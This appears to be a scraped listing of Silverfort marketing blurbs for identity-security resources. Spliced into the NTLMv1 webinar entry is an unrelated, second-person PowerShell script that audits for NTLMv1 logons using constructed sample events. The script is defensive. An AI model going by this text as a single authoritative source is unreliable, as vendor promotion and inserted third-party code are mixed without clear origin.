- Strengthen identity as the foundation of zero trust: Enforce MFA, risk-based access, and continuous verification across every resource—even those legacy systems and command-line tools that traditional IAM can't reach.
- Advance along ZTMM stages with confidence: Progress from manual controls to adaptive, automated security with seamless deployment and unified access governance.
- Detect and block identity threats in real time: Stop lateral movement, credential misuse, and privilege escalation with continuous monitoring and automated threat response.
Whether you're just beginning your Zero Trust initiative or optimizing your current program, this whitepaper offers clear guidance and actionable insights—powered by Silverfort.

---

- Published: 2025-06-23
- Modified: 2025-06-23
- URL: https://www.silverfort.com/resources/solving-key-identity-security-challenges-in-smbs-with-silverfort/

Big identity challenges, SMB-ready solutions

Today’s small and medium-sized businesses (SMBs) face enterprise-level cyber threats—with a fraction of the resources. From ransomware to credential-based attacks, identity is now the frontline. But most SMBs have key blind spots in their identity security. MFA often stops at the cloud, non-human identities go unmonitored, and overburdened IT teams are left stitching together manual security controls. That’s where Silverfort comes in. This solution brief explores how a modern, identity-first security approach can eliminate these blind spots—without adding operational overhead. We'll lay out the core identity vulnerabilities SMBs face, and how Silverfort helps close those gaps quickly, simply, and securely.

In this brief, you’ll learn how to:

- Enforce MFA everywhere—not just in the cloud—with extended protection for RDP, legacy apps, file shares, and command-line access.
- Discover and secure non-human identities (NHIs) like service accounts and scripts, which often fly under the radar and pose huge risks.
- Simplify compliance and cyber insurance readiness with automated, policy-driven access controls and fast deployment—certified by Microsoft.

---

- Published: 2025-06-20
- Modified: 2025-06-20
- URL: https://www.silverfort.com/resources/silverfort-risk-and-incident-notifications-for-slack/

Stay ahead of identity threats with real-time Slack alerts

Security teams can’t afford to miss a beat. With Silverfort’s Risk and Incident Notifications for Slack, your team gets a direct line to critical security insights, delivered right where they collaborate.
This guide shows how to connect Silverfort with Slack to receive real-time, context-rich alerts the moment a security event occurs. From changes in entity risk levels to newly detected incidents, your team will always know what’s happening, and how to respond, without switching tools or chasing logs. Set it up in minutes, empower your team for faster incident response, and never let risk notifications slip through the cracks again. In this guide, you’ll learn how to: Integrate Slack and Silverfort to push alerts directly to your security channels based on customized risk levels. Accelerate incident response with immediate access to detailed event data, right inside Slack. Gain full visibility into security threats, helping you prioritize and act on high-risk events faster. Get the PDF to streamline your security workflows with Slack. --- - Published: 2025-06-20 - Modified: 2025-06-20 - URL: https://www.silverfort.com/resources/silverfort-risk-and-incident-notifications-for-microsoft-teams/ Supercharge Microsoft Teams with Silverfort risk alerts Want to turn Microsoft Teams into a security command center? With Silverfort’s Risk and Incident Notifications for Microsoft Teams, now you can. Our solution brief explains how to integrate Silverfort with Teams to receive instant alerts on security events—from risk level changes to critical incident discoveries—right in your chat feed. No more toggling between dashboards or digging through logs. You’ll get context-rich notifications that empower faster, smarter responses to emerging threats. Easy to deploy and highly configurable, this integration turns collaboration into action. In this guide, you’ll learn how to: Connect Microsoft Teams to Silverfort to enable custom, real-time risk and incident notifications. Improve visibility across your environment, so you can prioritize threats with clarity and speed. Streamline security ops with faster incident detection and reduced time-to-response. 
Get the PDF to elevate your detection and response game with Teams. --- - Published: 2025-06-18 - Modified: 2025-06-18 - URL: https://www.silverfort.com/resources/silverfort-ai-agent-security/ Confidently secure the next wave of AI innovation with Silverfort's AI Agent Security. AI agents are changing the game, bringing automation, reasoning, and decision-making into everyday enterprise workflows. But with real potential comes real risk. These agents often act independently, hold high privileges, and can’t always be traced back to a specific human owner, creating a recipe for unaccountable access, data leakage, and security blind spots. Silverfort AI Agent Security bridges the gap between innovation and protection. This solution brief explores how Silverfort treats AI agents as fully governed identities by making every action attributable, every access justifiable, and every decision secure. With inline enforcement, least-privilege access, and seamless deployment, you can embrace AI without exposing your critical systems. In this solution brief, you’ll learn: How to enforce human accountability for AI agents by linking every action to a real user for transparency and auditability. How to stop AI agent overreach by preventing lateral movement, data misuse, and hidden prompt injection attacks. How to deploy identity-first security with centralized control, inline access policies, and fast, non-intrusive integration. Get the brief today and learn how to unlock AI agent potential securely. Ready to see Silverfort's AI Agent Security in action? Get a demo here. --- - Published: 2025-06-17 - Modified: 2025-08-19 - URL: https://www.silverfort.com/resources/facing-and-overcoming-retail-identity-protection-challenges-2/ In the rapidly evolving threat landscape, retail companies have emerged as prime targets for identity threats, highlighting a concerning trend in the industry’s attack surface. 
The sheer volume of customer data handled by retail businesses, coupled with the increasing sophistication of cybercriminals, has created a perfect storm for identity-related security breaches. Download this eBook to learn: The different identity protection challenges that retailers face Why traditional MFA and other common solutions are ineffective for defending against identity threats How Silverfort can empower you with end-to-end identity protection across your environments --- - Published: 2025-06-13 - Modified: 2025-06-13 - URL: https://www.silverfort.com/resources/comply-with-the-security-of-critical-infrastructure-soci-act-requirements-with-silverfort/ Australia’s Security of Critical Infrastructure (SOCI) Act has transformed the regulatory landscape for operators of essential services. With expanded coverage across 11 sectors and strict requirements like real-time incident reporting and board-level cyber accountability, the stakes have never been higher. This white paper unpacks how Silverfort enables seamless SOCI compliance through modern identity security. From unifying visibility across legacy, cloud, and hybrid systems to enforcing granular access controls and dynamic risk-based policies, Silverfort empowers organisations to prevent identity-based attacks, pass audits, and avoid costly penalties. In this white paper, you'll learn how to: Automatically fulfil SOCI’s Positive Security Obligations through adaptive identity controls Prevent credential compromise, lateral movement, and unauthorised access across all environments Extend MFA, privileged access security, and continuous monitoring to every identity—including legacy and non-human accounts Whether you're preparing for a board attestation or aiming to meet CIRMP requirements, this is your go-to guide for identity-first compliance. 
--- - Published: 2025-06-13 - Modified: 2025-06-13 - URL: https://www.silverfort.com/resources/silverfort-authenticator-for-microsoft-teams/ Introducing Silverfort Authenticator for Microsoft Teams, a seamless way to extend secure authentication flows into the collaboration tool your teams use every day. With this integration, organizations can replace or supplement the Silverfort Desktop Application. In addition to Identity Bridge flows, Silverfort Authenticator for Microsoft Teams supports FIDO2 tokens, One-Time Password (OTP) authentication, and Just-in-Time (JIT) access notifications for Privileged Access Security users. These capabilities allow end users to receive and approve access requests directly within Microsoft Teams, reducing dependency on the Silverfort Desktop Application while maintaining a strong identity security posture across authentication methods. Whether you're supporting hybrid infrastructure, legacy systems, or privileged access workflows, Silverfort’s Teams integration makes secure access frictionless and intuitive. Simplify Silverfort deployment with authentication inside Teams Extend FIDO2, OTP, and JIT access policies for privileged users—without leaving your chat window Eliminate complexity, boost adoption, and secure every identity, right where your users work --- - Published: 2025-06-09 - Modified: 2025-06-09 - URL: https://www.silverfort.com/resources/silverfort-and-onespan-fido2-integration/ Looking to eliminate identity threats across your entire infrastructure — even the resources traditional MFA can’t reach? Silverfort and OneSpan have joined forces to deliver a powerful, seamless integration that enables FIDO2 multi-factor authentication (MFA) across every on-prem and cloud resource, including legacy systems, remote access tools, and critical IT infrastructure. 
This joint solution combines OneSpan’s FIDO2-certified hardware authenticators with Silverfort’s adaptive authentication and real-time risk analysis, allowing you to strengthen your identity security posture without compromising user experience. Whether it’s securing PowerShell access, protecting file shares, or enforcing consistent authentication across SaaS and RDP, this integration lets you stop identity-based attacks in their tracks, even in places MFA couldn’t reach before. Read this solution brief to learn: How the integration works: See how Silverfort evaluates risk and triggers OneSpan’s FIDO2 MFA only when suspicious activity is detected. Where MFA can now go: Discover how to protect legacy apps, command-line tools, desktop logins, and more — without code changes. Why it matters: Understand the business and security benefits of extending real-time identity protection across your hybrid environment. No MFA fatigue. No resource left behind. Just airtight, context-aware identity protection wherever it’s needed. --- - Published: 2025-06-06 - Modified: 2025-06-06 - URL: https://www.silverfort.com/resources/silverfort-cyberark-joint-solution-brief/ Seamlessly extend CyberArk Identity to on-prem resources At Silverfort, we enable organizations to bring modern identity security to legacy environments. Our CyberArk Identity Bridge integrates legacy authentication protocols—such as Kerberos, NTLM, and LDAPS—into CyberArk Identity, transforming on-prem resources into manageable, policy-driven entities. By acting as a SAML Service Provider (SP), we make it possible to apply CyberArk’s web SSO flows, MFA, and access policies to previously unprotectable assets like legacy apps, command-line tools, and IT infrastructure. With our bridge, every authentication attempt is evaluated and routed through CyberArk Identity, ensuring consistent policy enforcement, real-time protection, and a seamless user experience across hybrid environments. 
Organizations can gain unified visibility and control, dramatically reducing the risk of identity-based attacks and lateral movement threats. Why it matters: Unify identity security across cloud and on-prem resources with centralized access policies and MFA. Protect the unprotectable, applying CyberArk Identity controls to legacy apps, servers, and infrastructure. Stop advanced threats, including lateral movement and ransomware, with real-time detection and enforcement. Explore how Silverfort brings end-to-end identity security to every corner of your environment. --- - Published: 2025-06-06 - Modified: 2025-06-06 - URL: https://www.silverfort.com/resources/an-identity-security-playbook-the-what-and-the-why/ Every security program needs a floor to stand on and a ceiling to grow into. In identity security, that floor is visibility, control, and the ability to act when something looks off. The ceiling is a strategy that holds up under pressure, even as your environment expands across cloud, hybrid, human, and machine identities. Most teams are stuck somewhere in between. This session lays out a clear playbook to move from scattered tools and reactive policies to a connected, enforceable identity strategy. We will walk through the IDEAL framework step by step, (Integrate, Discover, Enforce, Act & Action, Lightweight), with a focus on how to apply it in real environments without starting from scratch. Key takeaways: What today’s identity attack surface really looks like Why fragmentation makes access control harder than it should be How to secure both human and non-human identities across hybrid environments Where the IDEAL framework helps close gaps and raise your baseline How to get started with wins that build momentum If you are ready to raise the floor of your identity program and start building toward a more resilient ceiling, this webinar is for you. 
--- - Published: 2025-05-30 - Modified: 2025-05-30 - URL: https://www.silverfort.com/resources/shining-a-light-on-the-hidden-risks-of-non-human-identities/ Non-human identities (NHIs) - like service accounts, API keys, certificates, tokens, automation scripts, and cloud roles - now outnumber human users 50 to 1 in the average enterprise. These machine identities can authenticate, move laterally, and access sensitive systems - yet they often operate without oversight, visibility, or proper controls. In this webinar, identity security experts Nick Cavalancia and Roy Akerman (VP, Identity Security Strategy at Silverfort) expose the growing NHI attack surface and reveal how adversaries are weaponizing unmanaged, overprivileged, and ownerless accounts across hybrid and multi-cloud environments. What you'll learn in this webinar: What qualifies as a non-human identity in modern environments Why NHIs are exploding in number - and how they’re created Real-world breach examples: OAuth token abuse, Dropbox Sign compromise, and more How attackers exploit dormant service accounts and cloud secrets to move laterally Gaps in traditional IAM, PAM, and MFA when it comes to NHIs Key findings from Silverfort’s NHI Spotlight Report (2025) How to establish behavioral baselines and apply adaptive security controls Steps to discover, classify, and govern NHIs across all environments Whether you're an identity architect, SOC analyst, or CISO, this session gives you practical guidance and a clear action plan to regain visibility and control over your fastest-growing identity risk. --- - Published: 2025-05-27 - Modified: 2025-05-27 - URL: https://www.silverfort.com/resources/solving-key-identity-security-challenges-in-state-and-local-government-with-silverfort/ In 2024, 34% of U.S. state and local government organizations reported being hit by ransomware attacks, with the average recovery cost reaching $2.8m. 
Without proper security controls, government agencies remain at risk of significant security challenges, especially against identity-based attacks. Download this solution brief to learn: What makes the government sector a key target for identity threats Key steps for solving identity security challenges How the Silverfort Identity Security Platform can help --- - Published: 2025-05-27 - Modified: 2025-06-10 - URL: https://www.silverfort.com/resources/solving-key-identity-security-challenges-in-finance-with-silverfort/ Financial services remains a top target for ransomware and credential-based attacks, with a sharp increase of 61% year-over-year in Q1 2025. Without proper security controls, financial organizations face serious risks from identity-based threats and escalating financial, operational and reputational damage. Download this solution brief to discover: Why the finance sector is a key target for identity threats How to solve identity security challenges affecting your sector How the Silverfort Identity Security Platform can help --- - Published: 2025-05-22 - Modified: 2025-05-22 - URL: https://www.silverfort.com/resources/winning-the-privileged-access-battle-from-firefighting-to-field-control/ Identity security has a privileged access problem. Faced with massive complexity in securing your most important infrastructure, current approaches to controlling privileged access risk put you in firefighting mode and in the slow lane to winning. Rob Ainscough knows this firsthand. As Head of IAM at Tesco, he didn’t just follow the playbook — he had to rewrite it, with attackers circling and auditors closing in. Now, as Silverfort’s Chief Identity Security Advisor, Rob’s stepping back onto the field to show how to build a robust identity floor that holds the line. One that buys you space and time to regroup, improve, and push forward with confidence. 
Watch this on-demand webinar to learn first-hand: Why privilege controls fail, even with all the “right” tools What didn’t work — and what finally did How to break the cycle and start building forward, with confidence Why the floor is your defensive line — and the ceiling is where real maturity begins Battle-tested tactics, red team lessons, and strategy that works in the real world This isn’t a roadmap. This is a game plan. Rob will show you how to stop chasing compliance and start controlling risk — from the ground up. --- - Published: 2025-05-21 - Modified: 2025-05-21 - URL: https://www.silverfort.com/resources/schutz-sensibler-konten-ohne-umwege-privileged-access-neu-gedacht/ Administrator accounts are a primary target for attackers. If one is compromised, the attacker can gain undetected access to the entire network, with severe consequences. For a long time, classic security approaches such as Privileged Access Management (PAM) were considered sufficient. But modern attack techniques and dynamic infrastructures show that reactive measures fall short. What is needed is a proactive, identity-centric approach that protects privileged access in real time. Silverfort delivers exactly that: enforceable access policies without agents or password vaults, together with maximum protection against credential abuse, lateral movement and unseen compromise. 
In this webcast you will learn: What risks are associated with privileged admin accounts Why classic PAM solutions often reach their limits in hybrid infrastructures How PAM and Silverfort PAS (Privileged Access Security) complement each other How to use PAS to implement tiering models, segment privileged access and prevent misuse with just-in-time access policies Why privileged identities need real-time protection --- - Published: 2025-05-09 - Modified: 2025-05-09 - URL: https://www.silverfort.com/resources/get-ahead-of-hipaas-new-identity-requirements/ Download the Free HIPAA Identity Compliance Cheat Sheet Cyberattacks targeting healthcare are surging—and outdated HIPAA rules can’t keep up. Proposed updates aim to modernize identity security mandates, but once ratified, enforcement will come fast. This cheat sheet helps you understand what’s changing, why it matters now, and how to prepare. With complex, fragmented compliance requirements across states, healthcare organizations must act early to reduce risk and stay ahead. What You’ll Learn: Key changes to identity security under HIPAA’s proposed updates Where and how MFA will be required for ePHI access Expanded incident response and reporting obligations How to assess risks through better identity security posture management What’s needed for continuous monitoring and enforcement --- - Published: 2025-05-08 - Modified: 2025-06-06 - URL: https://www.silverfort.com/resources/bridging-on-prem-authentication-with-keyless-security/ Explore how Silverfort’s Keyless bridge extends biometric, phishing-resistant MFA across your hybrid infrastructure—from cloud to legacy on-prem systems. This one-pager breaks down how Keyless, Silverfort’s privacy-preserving facial recognition solution, integrates seamlessly into existing environments to unify identity security without disrupting operations. 
Learn how to enforce modern access policies everywhere, detect lateral movement, and gain full visibility into authentication activity across all resources. Why read this? Protect the unprotectable – Extend Keyless MFA to legacy apps, servers, and command-line tools. Seamless integration – Apply cloud-native access controls across on-prem and SaaS environments. Real-time identity protection – Detect and block lateral movement attacks before they escalate. --- - Published: 2025-05-06 - Modified: 2025-05-06 - URL: https://www.silverfort.com/resources/microsoft-silverfort-webinar-meilleures-pratiques-et-challenges-du-tiering-ad/ As the identity attack surface keeps evolving with new methods for compromising organizations, the need to secure Active Directory (AD) grows ever more important. Although AD tiering is a fundamental practice for separating and protecting privileged accounts, many organizations neglect its importance, leaving them vulnerable to malicious actors. Implementing rigorous security controls is essential to prevent unauthorized access and lateral movement. In this webinar, Microsoft and Silverfort explore the essentials of AD tiering and its challenges, and discuss how Silverfort's capabilities help organizations overcome those challenges with ease. --- - Published: 2025-05-06 - Modified: 2025-05-06 - URL: https://www.silverfort.com/resources/sichere-identitaten-weniger-risiko-so-stoppen-sie-ransomware-effektiv/ The cybersecurity landscape is changing rapidly, and identity security plays a decisive role in protecting against modern threats. In hybrid enterprise environments it is essential to know exactly who is accessing what, in order to prevent unauthorized access while ensuring that permissions remain secure. 
Yet many companies lack a comprehensive overview of their identities and access rights, a weakness that cybercriminals deliberately exploit. Ransomware attacks in particular are no longer the exception; they are a constant threat to companies of every size. Lateral movement is especially problematic: it lets attackers spread through the network unnoticed and turn a single incident into a company-wide crisis. But why has lateral movement increased so sharply in recent years? And why do even modern security solutions often fail to stop this threat effectively? In this webinar you will learn: Why lateral movement is one of the greatest dangers to your IT How on-prem MFA and service account protection contain ransomware Why identity-centric protection is indispensable How to enforce least-privilege and JIT access policies with Silverfort's Privileged Access Security (PAS) --- - Published: 2025-04-30 - Modified: 2025-07-01 - URL: https://www.silverfort.com/resources/cyber-assessment-framework-caf-compliance-with-silverfort/ As identity-based threats rise across critical infrastructure sectors, compliance with the UK’s Cyber Assessment Framework (CAF) is more vital—and complex—than ever. That’s where Silverfort comes in. Our new whitepaper, “CAF Compliance with Silverfort,” provides a deep dive into how your organisation can streamline its path to CAF compliance using the Silverfort Identity Security Platform. From securing privileged accounts to enforcing multi-factor authentication (MFA) across previously unprotectable resources, Silverfort equips your team with the tools to meet and exceed CAF security objectives. This comprehensive guide maps Silverfort’s capabilities directly to CAF’s core principles, including identity and access control, privileged user management, and continuous monitoring. 
Learn how to automatically discover and classify privileged accounts, enforce Just-in-Time (JIT) access policies, and eliminate standing privileges—without complex deployments or traditional PAM limitations. Whether you're just starting your CAF journey or enhancing existing controls, this whitepaper outlines how Silverfort helps reduce your attack surface, improve incident response, and satisfy compliance requirements with minimal disruption. What you'll learn: How Silverfort aligns with each CAF objective and principle Why traditional PAM leaves critical gaps—and how to close them How to enforce Zero Standing Privileges and detect identity threats in real time Download the whitepaper now and take the first step toward effortless CAF compliance. --- - Published: 2025-04-22 - Modified: 2025-04-22 - URL: https://www.silverfort.com/resources/uncovering-and-addressing-the-blind-spots-in-privileged-access-management/ Many organizations depend on Privileged Access Management (PAM) to secure administrator accounts — but relying on PAM alone can leave dangerous security gaps. Attackers increasingly exploit standing privileges, misconfigured accounts, and overlooked non-human identities. It’s time to evolve your privileged access strategy. In this webinar, Ron Rasin, Chief Strategy Officer at Silverfort, and Kev Smith, Principal Engineer at Silverfort, discuss the inherent blind spots in traditional PAM solutions and dive into the fundamentals of Privileged Access Security (PAS), interactively exploring key strategies for discovering, classifying, and securing privileged accounts across various organizational tiers. 
Topics covered include: Why PAM solutions fall short in fully securing privileged accounts The hidden risks of standing privilege in both human and non-human identities How to continuously discover and classify privileged accounts across your environment The power of Just-in-Time (JIT) access to eliminate standing privileges How virtual fencing can enforce secure, context-based access controls Ways to strengthen your identity security posture and reduce cyber insurance premiums --- - Published: 2025-04-10 - Modified: 2025-05-07 - URL: https://www.silverfort.com/resources/qualify-for-cyber-insurance-with-fast-and-effective-ad-security/ As cyber insurance requirements tighten, organizations are under pressure to demonstrate robust identity security—particularly within Active Directory (AD) environments. In our latest guide, we outline how businesses can meet and exceed insurer expectations by eliminating identity security blind spots and enforcing MFA across all privileged access points. We'll explore the four key reasons Silverfort is uniquely positioned to accelerate your cyber insurance policy qualification, detailing our partnerships with top insurers and how we help clients reduce premiums and eliminate coverage exclusions. Download the guide to learn how Silverfort can help you: Meet cyber insurance MFA and monitoring requirements with ease Prevent credential-based attacks across your hybrid environment Achieve rapid security improvements with minimal operational impact Secure your AD. Simplify your insurance journey. Strengthen your defenses. --- - Published: 2025-04-02 - Modified: 2025-04-15 - URL: https://www.silverfort.com/resources/case-study-trinity-college-cambridge-strengthens-mfa-and-service-account-protection-with-silverfort/ Trinity College Cambridge faced a critical challenge: securing privileged and service accounts in their on-prem Active Directory. 
While their cloud-based applications had strong security, legacy infrastructure remained exposed—and their service accounts lacked oversight. “Our privileged accounts and service accounts were a primary area of concern. We lacked visibility into service account behaviours, and our on-prem applications had no MFA support, leaving potential security gaps,” said Duncan Malthouse-Hobbs, Head of IT at Trinity College. Until they met Silverfort. By implementing Silverfort’s adaptive MFA and identity security, Trinity College: Enforced MFA on privileged accounts without disrupting IT operations Gained real-time visibility into service account activity and risks Secured legacy applications and command-line authentication “Rolling out Silverfort was incredibly straightforward. We quickly saw value in its ability to enforce MFA on legacy systems without additional software.” — Bryan Carpenter, IT Infrastructure Engineer This case study is a must-read for IT and security leaders looking to strengthen identity security across hybrid environments. --- - Published: 2025-04-01 - Modified: 2025-04-01 - URL: https://www.silverfort.com/resources/hipaa-compliance-2-0-is-your-identity-security-strategy-ready/ The newly proposed HIPAA security updates are being reviewed now, and they will demand more than just “check-the-box” compliance. Identity security is on the frontline of healthcare cybersecurity and HIPAA compliance. Attackers are actively exploiting weak identity security controls—don’t let your organization be next. The proposed changes to the HIPAA framework are a necessary step toward helping the healthcare industry in its fight against cybercriminals. However, even if the mandate stays the same, your identity security strategy cannot. Hear from our experts in a practical guidance webinar to learn: How attackers exploit weak authentication, excessive privileges, and service account misconfigurations. 
Proactive identity security strategies to strengthen your compliance posture. Best practices to get ahead of evolving HIPAA requirements and defend against emerging identity threats. Don’t miss this opportunity to ensure your organization is prepared, protected, and compliant. --- - Published: 2025-03-24 - Modified: 2025-03-31 - URL: https://www.silverfort.com/resources/securing-privileged-access-from-blind-spots-to-resilience/ Securing privileged users in Active Directory is more critical than ever—but relying solely on Privileged Access Management (PAM) solutions leaves security and operational gaps. Complex onboarding, maintenance challenges, and hidden blind spots prevent organizations from achieving true zero-trust resilience. This eBook explores a modern, automated approach to securing privileged access, whether replacing, complementing, or enhancing your existing PAM strategy. Download this eBook to learn: The hidden security gaps and challenges of traditional PAM solutions Five essential pillars of identity security for privileged access protection How Privileged Access Security (PAS) reduces risk and improves resilience Strategies to integrate PAS with or without an existing PAM solution How to achieve a triple-layered Zero Trust identity security approach for privileged access with Silverfort. Get the eBook and take the next step in securing your privileged users and service accounts in Active Directory and beyond. --- - Published: 2025-03-13 - Modified: 2025-03-19 - URL: https://www.silverfort.com/resources/francis-odums-securing-the-identity-attack-surface-report/ Learn why leading cybersecurity research and software analyst Francis Odum says that Silverfort is the "furthest along" in delivering a solution that covers the three core tenets of securing the identity attack surface: visibility, identity security posture management (ISPM), and identity threat detection and response (ITDR). 
The concept of the attack surface is nothing new, but its application to identity is. In this report, learn what it takes to protect the identity attack surface, and why it requires an end-to-end solution that both encompasses the core functionality and spans protection from the cloud to on-prem. Download this report to learn: The core security gaps in identity, and how to close them The core elements you should look for when seeking an identity security solution, and How Silverfort solves the identity security problem by going beyond traditional detection capabilities to "enforcing security controls at the identity layer" to stop risky authentication attempts. --- - Published: 2025-03-13 - Modified: 2025-03-13 - URL: https://www.silverfort.com/landing-page/on-demand-webinar/unveiling-ntlmv1-vulnerabilities-risks-and-mitigation-strategies-in-active-directory-environments/ Despite Microsoft's announcement of the deprecation of NTLMv1 due to its inherent security weaknesses, recent findings reveal that many organizations remain susceptible to NTLMv1-based attacks. A significant discovery by Silverfort's research team highlights a misconfiguration in Active Directory Group Policy which, despite the intention to disable NTLMv1, inadvertently permits its continued use. In this webinar, we do a comprehensive technical deep dive into the vulnerabilities associated with NTLMv1, emphasizing the implications of the identified Group Policy misconfiguration, and show how you can mitigate the risks. Gain insight into: NTLMv1 and Its Security Flaws: An overview of NTLMv1, its operational framework, and the inherent vulnerabilities that render it susceptible to exploitation. Active Directory Group Policy Misconfigurations: An in-depth analysis of the recent findings by Silverfort, detailing how certain misconfigurations can unintentionally allow NTLMv1 authentications to persist, undermining organizational security efforts. 
Exploitation Techniques: Examination of methods employed by attackers to leverage NTLMv1 vulnerabilities for bypassing SMB and LDAP signing, enabling credential theft and unauthorized network access. Mitigation Strategies: Best practices and actionable steps to effectively disable NTLMv1, correctly configure Group Policies, and enhance overall network security to prevent potential breaches. --- - Published: 2025-03-03 - Modified: 2025-03-28 - URL: https://www.silverfort.com/resources/identity-security-posture-management-with-silverfort/ Strengthen Your Identity Security Posture In today's complex hybrid environments, misconfigurations and legacy systems can leave organizations vulnerable to identity-based threats. Silverfort's Identity Security Posture Management (ISPM) solution provides comprehensive visibility into security gaps, enabling proactive detection and remediation of vulnerabilities before they can be exploited. By analyzing real user access activities across both on-prem and cloud infrastructures, Silverfort offers actionable insights to enhance your organization's resilience against identity threats. Download the solution brief to learn: How to identify and address misconfigurations and insecure settings that expose your environment to potential breaches. The benefits of unified analysis across on-prem and cloud environments for a holistic view of your security posture. Strategies for active exposure mitigation using actionable guidance and enforcement of adaptive policies. Take a proactive approach to identity security—download the solution brief now to fortify your organization's defenses. 
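For the NTLMv1 webinar entry above (published 2025-03-13), here is an added example that is not part of the webinar or of Silverfort's materials: a PowerShell audit implementing the two checks a practitioner would run after that session. It reads the LmCompatibilityLevel registry value that the "Network security: LAN Manager authentication level" GPO writes (5 means "Send NTLMv2 response only. Refuse LM & NTLM"), and, because the webinar's point is that the policy setting can leave NTLMv1 in use, it separately confirms what was actually negotiated by parsing Security event 4624, whose "Package Name (NTLM only)" field (LmPackageName) reads "NTLM V1" for NTLMv1 logons. The 4624 events at the bottom are constructed sample data, and the function names are my own.

```powershell
# Added example (not from the Silverfort webinar): audit a Windows host, typically a
# domain controller, for NTLMv1 use. Two independent checks:
#   1. the LmCompatibilityLevel value written by the GPO setting
#      "Network security: LAN Manager authentication level" (5 = refuse LM and NTLMv1);
#   2. what was actually negotiated, from Security event 4624, whose
#      "Package Name (NTLM only)" field (LmPackageName) is "NTLM V1" for NTLMv1 logons.
# The sample events at the bottom are constructed for offline testing; they are not real logs.

function Get-LmCompatibilityLevel {
    # Returns the configured LmCompatibilityLevel (0-5), or $null when the value is not set
    # (the OS default then applies) or the registry is not reachable (e.g. pwsh on Linux).
    $key  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $item = Get-ItemProperty -Path $key -Name LmCompatibilityLevel -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.LmCompatibilityLevel
}

function ConvertFrom-LogonEventXml {
    # Flattens the <EventData><Data Name="..."> pairs of one 4624 event into an object.
    param([Parameter(Mandatory)][string]$Xml)
    $doc  = [xml]$Xml
    $data = @{}
    foreach ($d in $doc.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    [pscustomobject]@{
        Time        = $doc.Event.System.TimeCreated.SystemTime
        User        = '{0}\{1}' -f $data['TargetDomainName'], $data['TargetUserName']
        Workstation = $data['WorkstationName']
        SourceIp    = $data['IpAddress']
        LogonType   = $data['LogonType']
        AuthPackage = $data['AuthenticationPackageName']
        LmPackage   = $data['LmPackageName']   # 'NTLM V1', 'NTLM V2', 'LM', or '-' for Kerberos
    }
}

function Get-NtlmV1Logons {
    # Returns the 4624 events that were authenticated with NTLMv1.
    # Pass -EventXml to audit exported or constructed events; omit it to read the live Security log.
    param([string[]]$EventXml)
    if (-not $EventXml) {
        $EventXml = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624 } -MaxEvents 5000 |
            ForEach-Object { $_.ToXml() }
    }
    $EventXml |
        ForEach-Object { ConvertFrom-LogonEventXml -Xml $_ } |
        Where-Object { $_.LmPackage -eq 'NTLM V1' }
}

# ---- constructed sample events (not real logs) ----
$ns = 'http://schemas.microsoft.com/win/2004/08/events/event'
$sample = @(
    # NTLMv1 network logon by a service account: this is the finding to remediate.
    "<Event xmlns='$ns'><System><EventID>4624</EventID><TimeCreated SystemTime='2025-03-13T10:00:00Z'/></System><EventData><Data Name='TargetUserName'>svc-backup</Data><Data Name='TargetDomainName'>CORP</Data><Data Name='LogonType'>3</Data><Data Name='AuthenticationPackageName'>NTLM</Data><Data Name='LmPackageName'>NTLM V1</Data><Data Name='WorkstationName'>BKP01</Data><Data Name='IpAddress'>10.0.5.21</Data></EventData></Event>",
    # NTLMv2 logon: acceptable where NTLM is still required.
    "<Event xmlns='$ns'><System><EventID>4624</EventID><TimeCreated SystemTime='2025-03-13T10:01:00Z'/></System><EventData><Data Name='TargetUserName'>jdoe</Data><Data Name='TargetDomainName'>CORP</Data><Data Name='LogonType'>3</Data><Data Name='AuthenticationPackageName'>NTLM</Data><Data Name='LmPackageName'>NTLM V2</Data><Data Name='WorkstationName'>WS042</Data><Data Name='IpAddress'>10.0.7.15</Data></EventData></Event>",
    # Kerberos logon: LmPackageName is '-' because no NTLM package was involved.
    "<Event xmlns='$ns'><System><EventID>4624</EventID><TimeCreated SystemTime='2025-03-13T10:02:00Z'/></System><EventData><Data Name='TargetUserName'>asmith</Data><Data Name='TargetDomainName'>CORP</Data><Data Name='LogonType'>2</Data><Data Name='AuthenticationPackageName'>Kerberos</Data><Data Name='LmPackageName'>-</Data><Data Name='WorkstationName'>WS017</Data><Data Name='IpAddress'>10.0.7.9</Data></EventData></Event>"
)

$hits = @(Get-NtlmV1Logons -EventXml $sample)
$hits | Format-Table Time, User, Workstation, SourceIp, LogonType -AutoSize

$level = Get-LmCompatibilityLevel
if ($null -eq $level) {
    Write-Host 'LmCompatibilityLevel not readable here (non-Windows host, or value unset so the OS default applies).'
} elseif ($level -lt 5) {
    Write-Warning "LmCompatibilityLevel is $level; set the GPO to 'Send NTLMv2 response only. Refuse LM & NTLM' (5)."
}
if ($hits.Count -gt 0) {
    Write-Warning "$($hits.Count) NTLMv1 logon(s) observed. A level-5 policy alone is not proof that NTLMv1 is gone; treat these sources as the remediation list."
}
```

Run it as-is to exercise the parser on the constructed events (it reports the svc-backup logon from BKP01 and nothing else); on a domain controller, call `Get-NtlmV1Logons` without `-EventXml` to read the live Security log. The filter keys on LmPackageName rather than AuthenticationPackageName so that NTLM negotiated through the Negotiate package is not missed. Before cutting NTLMv1 off at the policy, fix or retire the clients and applications this list surfaces, since they are what the Group Policy change will break.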
---
- Published: 2025-03-01
- Modified: 2025-03-28
- URL: https://www.silverfort.com/resources/non-human-identity-nhi-security-with-silverfort/

Secure Your Non-Human Identities with Silverfort

Non-human identities (NHIs), such as service accounts and automated processes, are integral to modern IT operations but often lack adequate security measures, making them prime targets for attackers. Silverfort's Non-Human Identity Security solution offers comprehensive protection by automatically discovering, monitoring, and securing all NHIs across your hybrid environment without the need for password rotation. This approach ensures seamless integration and robust defense against unauthorized access and lateral movement.

Download the solution brief to learn:
- How to achieve complete visibility over every NHI, including previously unknown accounts, to assess and mitigate potential risks.
- Strategies for enforcing adaptive access policies that detect and block anomalous behavior in real time, preventing lateral movement attacks.
- Methods to protect privileged service accounts without disrupting critical processes or requiring complex password rotations.

Enhance your organization's security posture by proactively managing and safeguarding non-human identities. Download the solution brief now to get started.

---
- Published: 2025-02-27
- Modified: 2025-08-12
- URL: https://www.silverfort.com/resources/the-identity-security-playbook/

Your 5-Step Action Plan to a Sustainable Identity Security Strategy

